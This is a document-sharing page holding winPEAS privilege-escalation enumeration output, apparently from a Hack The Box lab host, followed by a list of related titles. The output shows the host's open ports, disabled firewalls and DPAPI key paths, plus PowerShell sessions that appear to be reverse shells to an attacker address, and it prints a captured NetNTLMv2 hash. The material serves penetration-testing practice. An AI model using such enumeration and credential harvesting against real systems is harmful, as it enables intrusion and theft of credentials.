GLOBALROOT\SystemRoot\System32\drivers\vstxraid.sys

Intel(R) Rapid Storage Technology driver (inbox) - 15.44.0.1010 [Intel

Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorAVC.sys

PMC-Sierra HBA Controller - 1.3.0.10769 [PMC-Sierra]: \\.\GLOBALROOT\

SystemRoot\System32\drivers\ADP80XX.SYS

Smart Array SAS/SATA Controller Media Driver - 8.0.4.0 Build 1 Media Driver
(x86-64) [Hewlett-Packard Company]: \\.\GLOBALROOT\SystemRoot\System32\drivers\
HpSAMD.sys
MEGASAS RAID Controller Driver for Windows - 6.604.06.00 [Avago
Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas3i.sys

Microsoftr Windowsr Operating System - 2.60.01 [Silicon Integrated Systems

Corp.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\SiSRaid2.sys

SmartRAID, SmartHBA PQI Storport Driver - 1.50.0.0 [Microsemi

Corportation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\SmartSAMD.sys

QLogic FCoE offload driver - 8.33.4.2 [Cavium, Inc.]: \\.\GLOBALROOT\

SystemRoot\System32\drivers\qefcoe.sys
QLogic iSCSI offload driver - 7.14.7.2 [QLogic Corporation]: \\.\GLOBALROOT\
SystemRoot\System32\drivers\bxois.sys

QLogic FCoE Offload driver - 7.14.15.2 [QLogic Corporation]: \\.\GLOBALROOT\

SystemRoot\System32\drivers\bxfcoe.sys

VMware Pointing USB Device Driver - 12.5.10.0 build-14169150 [VMware,

Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmusbmouse.sys

VMware Pointing PS/2 Device Driver - 12.5.10.0 build-14169150 [VMware,

Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmmouse.sys
VMware SVGA 3D - 8.17.02.0012 - build-17216209 [VMware, Inc.]: \\.\GLOBALROOT\
SystemRoot\system32\DRIVERS\vm3dmp_loader.sys

VMware SVGA 3D - 8.17.02.0012 - build-17216209 [VMware, Inc.]: \\.\GLOBALROOT\

SystemRoot\system32\DRIVERS\vm3dmp.sys

VMware PCIe Ethernet Adapter NDIS 6.30 (64-bit) - 1.8.17.0 build-17274505

[VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmxnet3.sys

VMware server memory controller - 7.5.5.0 build-14903665 [VMware, Inc.]: \\.\

GLOBALROOT\SystemRoot\system32\DRIVERS\vmmemctl.sys

????????????????????????????????????? Network
Information ?????????????????????????????????????

???????????? Network Shares

ADMIN$ (Path: C:\Windows)
backups (Path: C:\backups)
C$ (Path: C:\)
IPC$ (Path: )

===================================================================================
==============

???????????? Host File

???????????? Network Ifaces and known hosts

? The masks are only for the IPv4 addresses
Ethernet0 2[00:50:56:B0:46:1A]: 10.129.213.63, fe80::2817:55f4:e2f4:3fbb%7,
dead:beef::2817:55f4:e2f4:3fbb / 255.255.0.0
Gateways: 10.129.0.1, fe80::250:56ff:feb9:1486%7
DNSs: 1.1.1.1, 1.0.0.1
Known hosts:
10.129.0.1 00-50-56-B9-14-86 Dynamic
10.129.10.164 00-50-56-B0-00-BA Dynamic
10.129.26.134 00-50-56-B0-CD-85 Dynamic
10.129.67.186 00-50-56-B0-68-D1 Dynamic
10.129.95.187 00-50-56-B0-B8-1A Dynamic
10.129.114.3 00-50-56-B0-93-5B Dynamic
10.129.165.88 00-50-56-B0-6B-8A Dynamic
10.129.189.8 00-50-56-B0-A5-93 Dynamic
10.129.209.43 00-50-56-B0-2B-7F Dynamic
10.129.226.218 00-50-56-B0-7B-99 Dynamic
10.129.255.255 FF-FF-FF-FF-FF-FF Static
169.254.45.168 00-50-56-B0-A5-93 Dynamic
169.254.100.244 00-50-56-B0-7B-99 Dynamic
169.254.169.254 00-00-00-00-00-00 Invalid
169.254.201.20 00-50-56-B0-93-5B Dynamic
169.254.239.113 00-50-56-B0-68-D1 Dynamic
169.254.255.255 00-00-00-00-00-00 Invalid
224.0.0.22 01-00-5E-00-00-16 Static
224.0.0.251 01-00-5E-00-00-FB Static
224.0.0.252 01-00-5E-00-00-FC Static
255.255.255.255 FF-FF-FF-FF-FF-FF Static

Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0

DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1
Known hosts:
224.0.0.22 00-00-00-00-00-00 Static

???????????? Current TCP Listening Ports

? Check for services restricted from the outside
Enumerating IPv4 connections

Protocol Local Address Local Port Remote Address Remote Port

State Process ID Process Name

TCP 0.0.0.0 135 0.0.0.0 0

Listening 840 svchost
TCP 0.0.0.0 445 0.0.0.0 0
Listening 4 System
TCP 0.0.0.0 1433 0.0.0.0 0
Listening 1652 C:\Program Files\Microsoft SQL Server\
MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
TCP 0.0.0.0 5985 0.0.0.0 0
Listening 4 System
TCP 0.0.0.0 47001 0.0.0.0 0
Listening 4 System
TCP 0.0.0.0 49664 0.0.0.0 0
Listening 464 wininit
TCP 0.0.0.0 49665 0.0.0.0 0
Listening 940 svchost
TCP 0.0.0.0 49666 0.0.0.0 0
Listening 984 svchost
TCP 0.0.0.0 49667 0.0.0.0 0
Listening 1124 svchost
TCP 0.0.0.0 49668 0.0.0.0 0
Listening 600 services
TCP 0.0.0.0 49669 0.0.0.0 0
Listening 620 lsass
TCP 10.129.213.63 139 0.0.0.0 0
Listening 4 System
TCP 10.129.213.63 1433 10.10.16.50 39040
Established 1652 C:\Program Files\Microsoft SQL Server\
MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
TCP 10.129.213.63 49677 10.10.16.50 8888
Close Wait 1800 C:\Windows\System32\WindowsPowerShell\v1.0\
powershell.exe
TCP 10.129.213.63 49682 10.10.16.50 8888
Established 744 C:\Windows\System32\WindowsPowerShell\v1.0\
powershell.exe
TCP 10.129.213.63 49697 10.10.16.50 8888
Established 1216 C:\Windows\System32\WindowsPowerShell\v1.0\
powershell.exe
TCP 127.0.0.1 1434 0.0.0.0 0
Listening 1652 C:\Program Files\Microsoft SQL Server\
MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe

Enumerating IPv6 connections

Protocol Local Address Local Port Remote

Address Remote Port State Process ID
Process Name

TCP [::] 135 [::]

0 Listening 840 svchost
TCP [::] 445 [::]
0 Listening 4 System
TCP [::] 1433 [::]
0 Listening 1652 C:\Program Files\Microsoft SQL
Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
TCP [::] 5985 [::]
0 Listening 4 System
TCP [::] 47001 [::]
0 Listening 4 System
TCP [::] 49664 [::]
0 Listening 464 wininit
TCP [::] 49665 [::]
0 Listening 940 svchost
TCP [::] 49666 [::]
0 Listening 984 svchost
TCP [::] 49667 [::]
0 Listening 1124 svchost
TCP [::] 49668 [::]
0 Listening 600 services
TCP [::] 49669 [::]
0 Listening 620 lsass
TCP [::1] 1434 [::]
0 Listening 1652 C:\Program Files\Microsoft SQL
Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
TCP [fe80::2817:55f4:e2f4:3fbb%7] 445
[fe80::2817:55f4:e2f4:3fbb%7] 49699 Established 4
System
TCP [fe80::2817:55f4:e2f4:3fbb%7] 49699
[fe80::2817:55f4:e2f4:3fbb%7] 445 Established 4
System

???????????? Current UDP Listening Ports

? Check for services restricted from the outside
Enumerating IPv4 connections

Protocol Local Address Local Port Remote Address:Remote Port

Process ID Process Name

UDP 0.0.0.0 123 :

1304 svchost
UDP 0.0.0.0 500 *:* 984
svchost
UDP 0.0.0.0 4500 *:* 984
svchost
UDP 0.0.0.0 5353 *:* 320
svchost
UDP 0.0.0.0 5355 *:* 320
svchost
UDP 10.129.213.63 137 *:* 4
System
UDP 10.129.213.63 138 *:* 4
System
UDP 127.0.0.1 53997 *:* 984
svchost

Enumerating IPv6 connections

Protocol Local Address Local Port Remote

Address:Remote Port Process ID Process Name

UDP [::] 123 :

1304 svchost
UDP [::] 500 *:*
984 svchost
UDP [::] 4500 *:*
984 svchost
UDP [::] 5353 *:*
320 svchost
UDP [::] 5355 *:*
320 svchost

???????????? Firewall Rules

? Showing only DENY rules (too many ALLOW rules always)
Current Profiles: PUBLIC
FirewallEnabled (Domain): False
FirewallEnabled (Private): False
FirewallEnabled (Public): False
DENY rules:

???????????? DNS cached --limit 70--

Entry Name
Data

???????????? Enumerating Internet settings, zone and proxy configuration

General Settings
Hive Key Value
HKCU DisableCachingOfSSLPages 0
HKCU IE5_UA_Backup_Flag 5.0
HKCU PrivacyAdvanced 1
HKCU SecureProtocols 2688
HKCU User Agent Mozilla/4.0 (compatible;
MSIE 8.0; Win32)
HKCU CertificateRevocation 1
HKCU ZonesSecurityUpgrade System.Byte[]
HKCU EnableNegotiate 1
HKCU ProxyEnable 0
HKLM EnablePunycode 1

Zone Maps

No URLs configured
Zone Auth Settings

No Zone Auth Settings

????????????????????????????????????? Cloud
Information ?????????????????????????????????????
Learn and practice cloud hacking in training.hacktricks.xyz
AWS EC2? No
Azure VM? No
Azure Tokens? No
Google Cloud Platform? No
Google Workspace Joined? No
Google Cloud Directory Sync? No
Google Password Sync? No

????????????????????????????????????? Windows
Credentials ?????????????????????????????????????

???????????? Checking Windows Vault

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#credentials-manager--windows-vault

Not Found

???????????? Checking Credential manager

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#credentials-manager--windows-vault

[!] Warning: if password contains non-printable characters, it will be printed

as unicode base64 encoded string

[!] Unable to enumerate credentials automatically, error: 'Win32Exception:

System.ComponentModel.Win32Exception (0x80004005): Element not found'
Please run:
cmdkey /list

???????????? Saved RDP connections

Not Found

???????????? Remote Desktop Server/Client Settings

RDP Server Settings
Network Level Authentication :
Block Clipboard Redirection :
Block COM Port Redirection :
Block Drive Redirection :
Block LPT Port Redirection :
Block PnP Device Redirection :
Block Printer Redirection :
Allow Smart Card Redirection :

RDP Client Settings

Disable Password Saving : True

Restricted Remote Administration : False
???????????? Recently run commands
Not Found

???????????? Checking for DPAPI Master Keys

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#dpapi
MasterKey: C:\Users\sql_svc\AppData\Roaming\Microsoft\Protect\S-1-5-21-
1479773013-2644727484-962428355-1001\6fc21731-a2de-4f1a-aeeb-ed5c000f18ca
Accessed: 1/19/2020 3:10:06 PM
Modified: 1/19/2020 3:10:06 PM

===================================================================================
==============

MasterKey: C:\Users\sql_svc\AppData\Roaming\Microsoft\Protect\S-1-5-21-
1479773013-2644727484-962428355-1001\9499e43c-ccd0-4465-b19f-3d9ced256dd5
Accessed: 3/7/2025 8:06:38 AM
Modified: 3/7/2025 8:06:38 AM

===================================================================================
==============

MasterKey: C:\Users\sql_svc\AppData\Roaming\Microsoft\Protect\S-1-5-21-
1479773013-2644727484-962428355-1001\9f851a43-e6fe-4ab5-9be0-c931324190ab
Accessed: 7/26/2021 9:14:39 AM
Modified: 7/26/2021 9:14:39 AM

===================================================================================
==============

???????????? Checking for DPAPI Credential Files

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#dpapi
Not Found

???????????? Checking for RDCMan Settings Files

? Dump credentials from Remote Desktop Connection Manager
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#remote-desktop-credential-manager

Not Found

???????????? Looking for Kerberos tickets

? https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-kerberos-
88/index.html
Not Found

???????????? Looking for saved Wifi credentials

[X] Exception: Unable to load DLL 'wlanapi.dll': The specified module could not
be found. (Exception from HRESULT: 0x8007007E)

Enumerating WLAN using wlanapi.dll failed, trying to enumerate using 'netsh'

No saved Wifi credentials found

???????????? Looking AppCmd.exe

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#appcmdexe
Not Found
You must be an administrator to run this check

???????????? Looking SSClient.exe

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#scclient--sccm

Not Found

???????????? Enumerating SSCM - System Center Configuration Manager settings

???????????? Enumerating Security Packages Credentials

Version: NetNTLMv2
Hash:
sql_svc::ARCHETYPE:1122334455667788:44ae39a45e3ed3759d0be884599e73d2:01010000000000
00856d0d3aa08fdb01133b7281d6cef6440000000008003000300000000000000000000000003000003
569707567b564c32c0d90ffc4ccd97ecacf3dc4f89ce86bb89f0bf1b545089d0a001000000000000000
00000000000000000000090000000000000000000000

===================================================================================
==============

????????????????????????????????????? Browsers
Information ?????????????????????????????????????

???????????? Showing saved credentials for Firefox

Info: if no credentials were listed, you might need to close the browser and
try again.

???????????? Looking for Firefox DBs

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#browsers-history

Not Found

???????????? Looking for GET credentials in Firefox history

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#browsers-history

Not Found

???????????? Showing saved credentials for Chrome

Info: if no credentials were listed, you might need to close the browser and
try again.

???????????? Looking for Chrome DBs

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#browsers-history

Not Found

???????????? Looking for GET credentials in Chrome history

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#browsers-history

Not Found
???????????? Chrome bookmarks
Not Found

???????????? Showing saved credentials for Opera

Info: if no credentials were listed, you might need to close the browser and
try again.

???????????? Showing saved credentials for Brave Browser

Info: if no credentials were listed, you might need to close the browser and
try again.

???????????? Showing saved credentials for Internet Explorer (unsupported)

Info: if no credentials were listed, you might need to close the browser and
try again.

???????????? Current IE tabs

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#browsers-history

[X] Exception: System.Reflection.TargetInvocationException: Exception has been

thrown by the target of an invocation. --->
System.Runtime.InteropServices.COMException: Class not registered (Exception from
HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG))

--- End of inner exception stack trace ---

at System.RuntimeType.InvokeDispMethod(String name, BindingFlags invokeAttr,

Object target, Object[] args, Boolean[] byrefModifiers, Int32 culture, String[]
namedParameters)
at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags,
Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers,
CultureInfo culture, String[] namedParams)
at winPEAS.KnownFileCreds.Browsers.InternetExplorer.GetCurrentIETabs()

Not Found

???????????? Looking for GET credentials in IE history

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#browsers-history

Not Found

???????????? IE favorites
Not Found

????????????????????????????????????? Interesting files and

registry ?????????????????????????????????????

???????????? Putty Sessions

Not Found

???????????? Putty SSH Host keys

Not Found

???????????? SSH keys in registry

? If you find anything here, follow the link to learn how to decrypt the SSH keys
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#ssh-keys-in-registry
Not Found

???????????? SuperPutty configuration files

???????????? Enumerating Office 365 endpoints synced by OneDrive.

SID: S-1-5-19

===================================================================================
==============

SID: S-1-5-20

===================================================================================
==============

SID: S-1-5-21-1479773013-2644727484-962428355-1001

===================================================================================
==============

SID: S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775

===================================================================================
==============

SID: S-1-5-18

===================================================================================
==============

???????????? Cloud Credentials

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#files-and-registry-credentials

Not Found

???????????? Unattend Files

???????????? Looking for common SAM & SYSTEM backups

???????????? Looking for McAfee Sitelist.xml Files

???????????? Cached GPP Passwords

???????????? Looking for possible regs with creds

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#inside-the-registry

Not Found
Not Found
Not Found
Not Found

???????????? Looking for possible password files in users homes

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#files-and-registry-credentials

???????????? Searching for Oracle SQL Developer config files

???????????? Slack files & directories

note: check manually if something is found

???????????? Looking for LOL Binaries and Scripts (can be slow)

? https://lolbas-project.github.io/
[!] Check skipped, if you want to run it, please specify '-lolbas' argument

???????????? Enumerating Outlook download files

???????????? Enumerating machine and user certificate files

???????????? Searching known files that can contain creds in home

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#files-and-registry-credentials

???????????? Looking for documents --limit 100--

Not Found

???????????? Office Most Recent Files -- limit 50

Last Access Date User

Application Document

???????????? Recent files --limit 70--

Not Found

???????????? Looking inside the Recycle Bin for creds files

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#files-and-registry-credentials

Not Found

???????????? Searching hidden files or folders in C:\Users home (can be slow)

C:\Users\Default
C:\Users\Default User
C:\Users\Default
C:\Users\All Users

???????????? Searching interesting files in other users home directories (can be

slow)

Checking folder: c:\users\administrator

===================================================================================
==============

???????????? Searching executable files in non-default folders with write

(equivalent) permissions (can be slow)

File Permissions "C:\Users\Public\winpeas.exe": sql_svc [AllAccess],Service

[WriteData/CreateFiles]

???????????? Looking for Linux shells/distributions - wsl.exe, bash.exe

/---------------------------------------------------------------------------
------\
| Do you like PEASS?
|

|---------------------------------------------------------------------------------|

| Learn Cloud Hacking : training.hacktricks.xyz

|---------------------------------------------------------------------------------|

| Thank you!
|
\---------------------------------------------------------------------------
------/

Escape
No ratings yet
Escape
26 pages
FuzzySecurity Windows Privilege Escalation Fundamentals
No ratings yet
FuzzySecurity Windows Privilege Escalation Fundamentals
18 pages
Windows Privilege Escalation Fundamentals
No ratings yet
Windows Privilege Escalation Fundamentals
36 pages
WWW Fuzzysecurity Com Tutorials 16 HTML
No ratings yet
WWW Fuzzysecurity Com Tutorials 16 HTML
32 pages
Optinewgdtweaks
No ratings yet
Optinewgdtweaks
6 pages
Red Release
No ratings yet
Red Release
6 pages
System Hacking - Eternal Blue Walkthrough
No ratings yet
System Hacking - Eternal Blue Walkthrough
29 pages
Ethical Hacking
No ratings yet
Ethical Hacking
5 pages
Hack The Box: Timelapse Overview
No ratings yet
Hack The Box: Timelapse Overview
19 pages
Windwos Coomand
No ratings yet
Windwos Coomand
12 pages
Ethical Hacking
No ratings yet
Ethical Hacking
5 pages
Cybersecurity Threat Analysis
No ratings yet
Cybersecurity Threat Analysis
4 pages
Access Machine Exploitation Guide
No ratings yet
Access Machine Exploitation Guide
14 pages
Top 200 Most Useful Windows Commands - A Must Know For Every User!
No ratings yet
Top 200 Most Useful Windows Commands - A Must Know For Every User!
11 pages
Windows Admin User Shellcode Guide
No ratings yet
Windows Admin User Shellcode Guide
286 pages
Cobalt Strike Privilege Escalation Guide
No ratings yet
Cobalt Strike Privilege Escalation Guide
30 pages
Process Hacker and Registry Methods
No ratings yet
Process Hacker and Registry Methods
6 pages
Windows - Privilege Escalation - Internal All The Things
No ratings yet
Windows - Privilege Escalation - Internal All The Things
3 pages
Billy Boss
No ratings yet
Billy Boss
21 pages
System Hacking with Metasploit Guide
No ratings yet
System Hacking with Metasploit Guide
28 pages
V 2 TTWR
No ratings yet
V 2 TTWR
17 pages
D
No ratings yet
D
4 pages
Windows Penetration Testing Command
No ratings yet
Windows Penetration Testing Command
16 pages
Osiris
No ratings yet
Osiris
21 pages
Cybersecurity Enthusiasts Guide
No ratings yet
Cybersecurity Enthusiasts Guide
2 pages
Apt 1
No ratings yet
Apt 1
17 pages
Useful Commands For RunDll32
No ratings yet
Useful Commands For RunDll32
5 pages
Active Directory Exploitation Guide
No ratings yet
Active Directory Exploitation Guide
42 pages
0 Delay + Ping Tweaks
No ratings yet
0 Delay + Ping Tweaks
68 pages
Conti Playbook Translated
No ratings yet
Conti Playbook Translated
32 pages
LSA Secrets Harvesting Guide
No ratings yet
LSA Secrets Harvesting Guide
5 pages
Windows Privilege Escalation
No ratings yet
Windows Privilege Escalation
30 pages
Readme For Dos
No ratings yet
Readme For Dos
5 pages
UAC Bypass Techniques for Windows 7-10
No ratings yet
UAC Bypass Techniques for Windows 7-10
40 pages
Course Index
No ratings yet
Course Index
15 pages
Cobalt Strike: Privilege Escalation Guide
No ratings yet
Cobalt Strike: Privilege Escalation Guide
30 pages
SS Guide - by Specially
No ratings yet
SS Guide - by Specially
11 pages
OSCP Cheat Sheet - Thor-Sec
100% (1)
OSCP Cheat Sheet - Thor-Sec
14 pages
Networking and Linux
No ratings yet
Networking and Linux
5 pages
Windows OS & Command-Line Guide
No ratings yet
Windows OS & Command-Line Guide
14 pages
Windows 7 System Overview
No ratings yet
Windows 7 System Overview
13 pages
CompTIA A+ Cheat Sheet
100% (1)
CompTIA A+ Cheat Sheet
8 pages
SQL Injection Exploitation Guide
No ratings yet
SQL Injection Exploitation Guide
15 pages
Windows Fundamentals
100% (1)
Windows Fundamentals
22 pages
Prev
No ratings yet
Prev
1,047 pages
Haze Writeup
No ratings yet
Haze Writeup
18 pages
0xsp Privilege Escalation Cheatsheet
No ratings yet
0xsp Privilege Escalation Cheatsheet
11 pages
Cheatsheet Metasploit&Meterpreter
No ratings yet
Cheatsheet Metasploit&Meterpreter
8 pages
Credential Hunting - OSCP
No ratings yet
Credential Hunting - OSCP
9 pages
Escape Two
No ratings yet
Escape Two
16 pages
Run Batch Tools Windows
No ratings yet
Run Batch Tools Windows
7 pages
Neuro
No ratings yet
Neuro
25 pages
Comandos PowerShell para Windows 7-10
No ratings yet
Comandos PowerShell para Windows 7-10
19 pages
Cobalt Strike AD Privilege Escalation Guide
No ratings yet
Cobalt Strike AD Privilege Escalation Guide
28 pages
Config
No ratings yet
Config
10 pages
r6672 Commads
100% (2)
r6672 Commads
100 pages
DoLAB - Ice TryHackMe Walkthrough
No ratings yet
DoLAB - Ice TryHackMe Walkthrough
7 pages
Brian
No ratings yet
Brian
2 pages
SAP's Role in Business Process Management
No ratings yet
SAP's Role in Business Process Management
3 pages
Fuse Tables
No ratings yet
Fuse Tables
50 pages
Fold5 User Manual SM-F946B UM EU UU Eng Rev.1.1 240417
No ratings yet
Fold5 User Manual SM-F946B UM EU UU Eng Rev.1.1 240417
196 pages
Getting Start Guide - New Product Development Project Plan - Clickup PDF
No ratings yet
Getting Start Guide - New Product Development Project Plan - Clickup PDF
8 pages
University of Mauritius: Faculty of Law and Management
No ratings yet
University of Mauritius: Faculty of Law and Management
3 pages
Release Notice For Swar Studio 3: Platform Improvement
No ratings yet
Release Notice For Swar Studio 3: Platform Improvement
2 pages
Exam and Corrected LC S2
No ratings yet
Exam and Corrected LC S2
31 pages
Guard Tour System BP-2002S: Designed by Bluecard
No ratings yet
Guard Tour System BP-2002S: Designed by Bluecard
5 pages
Eurabia: Europe's Transformation
0% (1)
Eurabia: Europe's Transformation
2 pages
Jots 4.1 PDF
100% (2)
Jots 4.1 PDF
47 pages
WaveLight Allegretto Wave Eye-Q - User Manual PDF
No ratings yet
WaveLight Allegretto Wave Eye-Q - User Manual PDF
232 pages
PCMAG 1991 03 Creating - A DPMI Based - DOS - Extender
No ratings yet
PCMAG 1991 03 Creating - A DPMI Based - DOS - Extender
7 pages
Pentium PC Assembly Language Overview
No ratings yet
Pentium PC Assembly Language Overview
13 pages
Lesson 1
No ratings yet
Lesson 1
7 pages
IT Transformation Milestone Plan
No ratings yet
IT Transformation Milestone Plan
1 page
Understanding Jailbreak
No ratings yet
Understanding Jailbreak
7 pages
Clustering African Hairstyle Data
No ratings yet
Clustering African Hairstyle Data
11 pages
Mochamad Iqbal Tawakal's CV Summary
No ratings yet
Mochamad Iqbal Tawakal's CV Summary
3 pages
Ensayo Sobre Los Pingüinos
100% (1)
Ensayo Sobre Los Pingüinos
8 pages
PCE Switch and Socket Overview
No ratings yet
PCE Switch and Socket Overview
14 pages
IT Support Specialist Resume
No ratings yet
IT Support Specialist Resume
2 pages
HPE7-A08 Exam Updated Practice Questions
No ratings yet
HPE7-A08 Exam Updated Practice Questions
10 pages
Erdas Imagine
No ratings yet
Erdas Imagine
115 pages
Online Teaching With Free LMS and Apps
No ratings yet
Online Teaching With Free LMS and Apps
27 pages
Lawrence Persons Cyberpunk
No ratings yet
Lawrence Persons Cyberpunk
9 pages
Fe - CS Xi Set B
No ratings yet
Fe - CS Xi Set B
7 pages
Virtual Instrumentation Experiments
No ratings yet
Virtual Instrumentation Experiments
25 pages
E-FSA Fire Alarm System Setup Guide
No ratings yet
E-FSA Fire Alarm System Setup Guide
45 pages
CH34X DRV Install Instructions
No ratings yet
CH34X DRV Install Instructions
4 pages
HW5 Handout
No ratings yet
HW5 Handout
5 pages